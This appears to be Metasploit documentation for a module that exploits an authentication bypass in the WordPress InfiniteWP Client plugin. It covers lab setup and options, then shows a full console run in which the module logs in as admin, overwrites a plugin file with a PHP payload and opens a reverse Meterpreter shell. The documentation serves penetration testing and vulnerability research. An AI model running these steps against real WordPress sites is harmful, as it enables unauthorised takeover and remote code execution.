## Vulnerable Application

### Description

This module exploits an authentication bypass in the WordPress
InfiniteWP Client plugin to log in as an administrator and execute
arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.

The module will attempt to retrieve the original `PLUGIN_FILE` contents
and restore them after payload execution. If `VerifyContents` is set,
which is the default setting, the module will check to see if the
restored contents match the original.

Note that a valid administrator username is required for this module.

WordPress >= 4.9 is currently not supported due to a breaking WordPress
API change. Tested against 4.8.3.

### Setup

1. Install WordPress 4.8.3 or older
2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
3. Follow <https://wordpress.org/plugins/iwp-client/#installation>

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This targets InfiniteWP Client versions < 1.9.4.5.

## Options

### USERNAME

Set this to a known, valid administrator username. Authentication will
be bypassed for this user.

### PLUGIN_FILE

Set this to a plugin file to insert the payload into, relative to the
plugins directory, which is normally `/wp-content/plugins`. The file
must exist and be writable by the web user. It will be overwritten and
later restored.

### VerifyContents

Verify that the restored contents of `PLUGIN_FILE` match the original.
This is the default setting.

## Scenarios

### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3

```
msf > use exploit/unix/webapp/wp_infinitewp_auth_bypass
msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > options

Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLUGIN_FILE  index.php        yes       Plugin file to edit
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       The base path to the wordpress application
   USERNAME     admin            yes       WordPress username
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   InfiniteWP Client < 1.9.4.5


msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
rport => 8000
msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] WordPress 4.8.3 is a supported target
[*] Found version 1.9.4.4 in the custom file
[+] The target appears to be vulnerable.
[*] Bypassing auth for admin at http://127.0.0.1:8000/
[+] Successfully obtained cookie for admin
[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
[+] Successfully logged in as admin
[*] Retrieving original contents of /wp-content/plugins/index.php
[+] Successfully retrieved original contents of /wp-content/plugins/index.php
[*] Contents:
<?php
// Silence is golden.
[*] Overwriting /wp-content/plugins/index.php with payload
[*] Acquired a plugin edit nonce: 74cde501ca
[*] Edited plugin file index.php
[+] Successfully overwrote /wp-content/plugins/index.php with payload
[*] Requesting payload at /wp-content/plugins/index.php
[*] Restoring original contents of /wp-content/plugins/index.php
[*] Sending stage (38288 bytes) to 192.168.56.1
[*] Acquired a plugin edit nonce: 74cde501ca
[*] Edited plugin file index.php
[+] Current contents of /wp-content/plugins/index.php match original!
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : c7f8fbe7b083
OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```
